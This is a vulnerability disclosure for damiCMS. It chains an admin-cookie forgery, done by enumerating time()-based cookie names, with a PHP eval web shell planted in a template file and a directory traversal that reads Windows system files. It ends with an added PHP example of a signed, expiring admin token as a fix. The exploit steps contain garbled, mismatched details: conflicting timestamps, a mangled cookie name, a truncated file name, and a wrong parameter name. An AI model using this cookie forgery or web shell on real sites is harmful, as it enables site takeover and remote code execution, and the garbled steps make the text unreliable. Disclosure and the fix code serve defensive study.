PART 1 : get the admin authentication
Here is a default damiCMS's admin user's cookie:
Cookie: sitevisitscookie=1; dmid=d3c104a4-849c-463e-a9c6-6921467cda41; BkGOp9578O_think_template=default; member_uid=1; finecms-admin-login=admin; member_cookie=c0600cb471b0f5b646d8; PHPSESSID=v0cqnbup2d5cnp0is7rrp9gdt7; BkGOp9578O_1535522538=czoxOiIxIjs%3D
The BkGOp9578O_1535522538=czoxOiIxIjs%3D cookie is updated when the admin logs in.
"BkGOp9578O_" is the default COOKIE_PREFIX, and "1533522538" comes from the time() function in PHP. The cookie is valid for 3 hours, which means we can get the admin permission just by enumerating a maximum of 10800 times if the admin has logged in.
Get a string from the time() function:
----genera.php
<?php echo time();?>
Craft a request, e.g.:
BkGOp9578O_15355$22538$=czoxOiIxIjs%3D
PART 2 : Remote Code Execution
When logged in as an admin (via Part 1), there is a Remote Code Execution vulnerability.
<?php @eval($_GET["code"]);?>
./Web/Tpl/default/head.html
http://localhost:8899/damiCMS/index.php?cmd=phpinfo();
PART 3 : Directory Traversal
When logged in as an admin (via Part 1), there is a Directory Traversal vulnerability.
Read the content of c:/windows/win.in
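The weakness in Part 1 is that the login cookie carries no secret: its value decodes to the constant s:1:"1"; and only the time() suffix in its name varies. As an added example (not damiCMS code; the function names, the token layout and the $secret key are assumptions, PHP 7.1+), a signed token with a random nonce that a fix could issue instead:

```php
<?php
// Added example, not damiCMS code. Function names and the token layout are
// hypothetical; $secret is an assumed per-install random key kept server-side.

const ADMIN_TTL = 10800; // 3 hours, the cookie lifetime stated in the report

// Decode the reported cookie value to show it is a constant serialized
// string with no per-session secret in it.
function decode_reported_value(string $v): string {
    return base64_decode(urldecode($v));
}

// Issue "uid.expiry.nonce.mac": 128-bit random nonce, HMAC-SHA256 over the rest.
function issue_admin_token(string $secret, int $uid, int $now): string {
    $body = $uid . '.' . ($now + ADMIN_TTL) . '.' . bin2hex(random_bytes(16));
    return $body . '.' . hash_hmac('sha256', $body, $secret);
}

// Return the uid for a valid, unexpired token, or null otherwise.
function verify_admin_token(string $secret, string $token, int $now): ?int {
    $parts = explode('.', $token);
    if (count($parts) !== 4) {
        return null;
    }
    [$uid, $expiry, $nonce, $mac] = $parts;
    $expected = hash_hmac('sha256', "$uid.$expiry.$nonce", $secret);
    if (!hash_equals($expected, $mac)) { // constant-time comparison
        return null;
    }
    if (!ctype_digit($uid) || !ctype_digit($expiry) || (int)$expiry < $now) {
        return null;
    }
    return (int)$uid;
}

$secret = 'PLACEHOLDER-load-a-random-key-from-config'; // constructed sample key
$now    = time();
$token  = issue_admin_token($secret, 1, $now);

var_dump(decode_reported_value('czoxOiIxIjs%3D'));                        // value from the report
var_dump(verify_admin_token($secret, $token, $now));                      // fresh token
var_dump(verify_admin_token($secret, $token, $now + ADMIN_TTL + 1));      // expired token
var_dump(verify_admin_token($secret, substr($token, 0, -1) . 'x', $now)); // tampered MAC
```

Such a token would be sent under a fixed cookie name with the HttpOnly and Secure flags, so that neither the name nor the value can be derived from the login time.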